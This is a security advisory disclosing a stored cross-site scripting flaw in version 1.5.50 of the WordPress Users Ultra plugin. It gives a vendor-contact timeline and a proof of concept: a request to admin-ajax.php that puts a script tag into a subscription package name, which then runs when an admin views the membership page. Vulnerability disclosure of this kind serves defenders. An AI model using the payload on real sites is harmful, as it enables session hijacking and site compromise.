* Exploit Title: WordPress Users Ultra Plugin [Persistence XSS] * Discovery Date: 2015/10/20 * Public Disclosure Date: 2015/12/01 * Exploit Author: Panagiotis Vagenas * Contact: https://twitter.com/panVagenas * Vendor Homepage: http://usersultra.com * Software Link: https://wordpress.org/plugins/users-ultra/ * Version: 1.5.50 * Tested on: WordPress 4.3.1 * Category: webapps Description ================================================================================ Once a user is registered he can add new subscription packages or modify existing ones. No data sanitization is taking place before saving package details in DB. This allows a malicious user to include JS code in package name and/or package description. PoC ================================================================================ - Send a post request to `http://vuln.site.tld/wp-admin/admin-ajax.php` with data: `action=package_add_new&p_name=a<script>alert(1)</script>` - Visit `http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership` as admin or go to the page that contains package information at front end. Timeline ================================================================================ 2015/10/29 - Vendor notified via email 2015/11/11 - Vendor notified via contact form in his website 2015/11/13 - Vendor notified via support forums at wordpress.org 2015/11/14 - Vendor responded and received report through email Solution ================================================================================ No official solution yet exists.